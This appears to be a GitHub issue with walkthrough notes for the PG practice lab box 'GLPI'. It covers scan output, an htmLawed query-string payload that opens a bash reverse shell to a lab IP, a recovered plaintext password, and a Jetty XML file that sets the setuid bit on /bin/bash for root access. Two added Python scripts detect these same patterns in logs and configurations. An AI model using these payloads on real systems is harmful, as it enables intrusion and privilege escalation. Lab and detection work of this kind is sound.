WDavid404 / PG-Box

PG box walkthrough note

GLPI (easy) #2

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago
```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: C01D32D71C01C8426D635C68C4648B09
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Authentication - GLPI
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
```

http://192.168.249.242/files/_log/sql-errors.log --> {"user":"7@ubuntu-focal"} "user":"2@ubuntu-focal"

[image] --> 10.0.2 is the version of GLPI?

searchsploit GLPI 10.0.2 --> found 51223, but it didn't work...

Finally, I found a good article: https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8

```
text=call_user_func&hhook=array_map&hfoo=system&spec[0]=&spec[1]=bash+-c+%27bash+-i+>%26+/dev/tcp/192.168.45.192/80+0>%261%27&sid=bs
```

[image]
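A defender-side check for the request pattern above, added here as an example (it is not part of the original issue or of GLPI): it parses Apache combined-format access log lines and flags requests whose query parameters match the call_user_func / array_map / system chain. The sample log lines are constructed; the third one carries the query string from the post. The htmLawedTest.php path in that line is an assumption about where GLPI ships its test page, not something the post states, so the check keys on the parameters rather than the path.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format (Apache/nginx); only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# PHP callables that pass a string to a shell; one of these in hfoo= is the
# tell-tale of the call_user_func -> array_map -> system chain.
SHELL_CALLABLES = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}
# Fragments typical of a command payload smuggled through spec[].
PAYLOAD_RE = re.compile(r"/dev/tcp/|bash -i|\b(?:nc|ncat|curl|wget|perl|python3?)\b")


def htmlawed_indicators(target):
    """Return the reasons a request target looks like htmLawed hook abuse (empty if none)."""
    params = parse_qs(urlsplit(target).query)  # decodes %xx and '+' for us
    reasons = []
    if "call_user_func" in params.get("text", []):
        reasons.append("text=call_user_func")
    for hook in params.get("hhook", []):
        reasons.append("hhook=" + hook)
    for fn in params.get("hfoo", []):
        if fn in SHELL_CALLABLES:
            reasons.append("hfoo=%s (shell-capable PHP callable)" % fn)
    spec_values = [v for k, vs in params.items() if k.startswith("spec[") for v in vs]
    if any(PAYLOAD_RE.search(v) for v in spec_values):
        reasons.append("spec[] carries a shell / reverse-shell command")
    return reasons


def scan_access_log(lines):
    """Parse log lines and return one hit per request that shows the pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = htmlawed_indicators(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "target": m["target"], "reasons": reasons,
                # several independent indicators together are a much stronger signal
                "confidence": "high" if len(reasons) >= 3 else "low",
            })
    return hits


# Constructed sample log lines; the third carries the query string from the post.
# The htmLawedTest.php path is an assumption about where GLPI ships the page.
SAMPLE_LOG = [
    '10.0.2.15 - - [10/May/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.2.15 - - [10/May/2024:12:00:07 +0000] "POST /front/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.45.192 - - [10/May/2024:12:00:19 +0000] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php'
    '?text=call_user_func&hhook=array_map&hfoo=system&spec[0]=&spec[1]=bash+-c+%27bash+-i+>%26+'
    '/dev/tcp/192.168.45.192/80+0>%261%27&sid=bs HTTP/1.1" 200 10 "-" "curl/7.81.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["confidence"], hit["reasons"])
```

A single `hhook=` parameter on its own is reported at low confidence because the test page takes that parameter legitimately; a request that also names `call_user_func` and a shell-capable callable is what an analyst should escalate, and a 200 status on such a request means the payload most likely ran.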

Betty's password can be found in the glpi_itilfollowups table: SnowboardSkateboardRoller234

```shell
echo '<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
<Call class="java.lang.Runtime" name="getRuntime">
<Call name="exec">
<Arg>
<Array type="String">
<Item>/bin/bash</Item>
<Item>-c</Item>
<Item>chmod +s /bin/bash</Item>
</Array>
</Arg>
</Call>
</Call>
</Configure>' > run.xml 
```

Then:

```shell
bash -p
```

[image]

Note: `<Item>/tmp/run.sh</Item>` doesn't work... I don't know why.
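An added example of the audit a defender would run against the Jetty side of this box; it is my code, not from the issue or from the Jetty project. It parses Jetty XML configuration files, flags `Call`/`New` elements that reach `java.lang.Runtime` or `java.lang.ProcessBuilder`, collects the argv of any nested `exec`/`start` call, and checks whether that argv adds a setuid/setgid bit the way the `chmod +s /bin/bash` payload above does. Both XML samples are constructed: the first reproduces the run.xml from the note, the second is a harmless ContextHandler definition.

```python
import re
import xml.etree.ElementTree as ET

# Classes and methods through which a Jetty XML file can spawn an OS process.
PROCESS_CLASSES = {"java.lang.Runtime", "java.lang.ProcessBuilder"}
PROCESS_METHODS = {"exec", "start"}
# chmod invocations that add a setuid/setgid bit: symbolic (+s, u+s, g+s) or numeric (2xxx/4xxx/6xxx).
SETUID_RE = re.compile(r"\bchmod\b[^;&|\n]*?(?:[ugoa]*\+[rwxXt]*s|\b[2467][0-7]{3}\b)")


def audit_jetty_xml(xml_text):
    """Return findings for Call/New elements that reach a process-spawning class."""
    root = ET.fromstring(xml_text)  # expat does not fetch the DTD named in the DOCTYPE
    findings = []
    _walk(root, False, findings)
    return findings


def _walk(elem, inside_process_class, findings):
    cls = elem.get("class")
    names_process_class = elem.tag in ("Call", "New") and cls in PROCESS_CLASSES
    reaches_process = inside_process_class or names_process_class
    if names_process_class:
        findings.append({"kind": "process-class",
                         "detail": "%s %s.%s" % (elem.tag, cls, elem.get("name", "<init>"))})
    # A nested <Call name="exec"> on a Runtime object: collect the argv it builds.
    if reaches_process and elem.tag == "Call" and elem.get("name") in PROCESS_METHODS:
        argv = [(item.text or "").strip() for item in elem.iter("Item")]
        findings.append({"kind": "process-exec", "argv": argv,
                         "setuid_change": any(sets_setuid_bit(a) for a in argv)})
    for child in elem:
        _walk(child, reaches_process, findings)


def sets_setuid_bit(command):
    """True if a shell command string contains a chmod that adds setuid/setgid."""
    return SETUID_RE.search(command) is not None


# Constructed samples: the first reproduces the run.xml from the note,
# the second is a harmless ContextHandler definition.
MALICIOUS_XML = """<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
<Call class="java.lang.Runtime" name="getRuntime">
<Call name="exec">
<Arg>
<Array type="String">
<Item>/bin/bash</Item>
<Item>-c</Item>
<Item>chmod +s /bin/bash</Item>
</Array>
</Arg>
</Call>
</Call>
</Configure>"""

BENIGN_XML = """<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
<Set name="contextPath">/health</Set>
<Set name="handler">
<New class="org.eclipse.jetty.server.handler.DefaultHandler"/>
</Set>
</Configure>"""

if __name__ == "__main__":
    for name, doc in (("run.xml", MALICIOUS_XML), ("health.xml", BENIGN_XML)):
        print(name, audit_jetty_xml(doc) or "clean")
```

Run it over every XML file Jetty is configured to load (its webapps and context directories); any `process-class` finding is worth a look, since legitimate deployment descriptors have no reason to touch `java.lang.Runtime`, and a `setuid_change` of `True` is a confirmed privilege-escalation attempt. Pair it with a periodic check for unexpected setuid binaries, because the file-mode change outlives the XML that caused it.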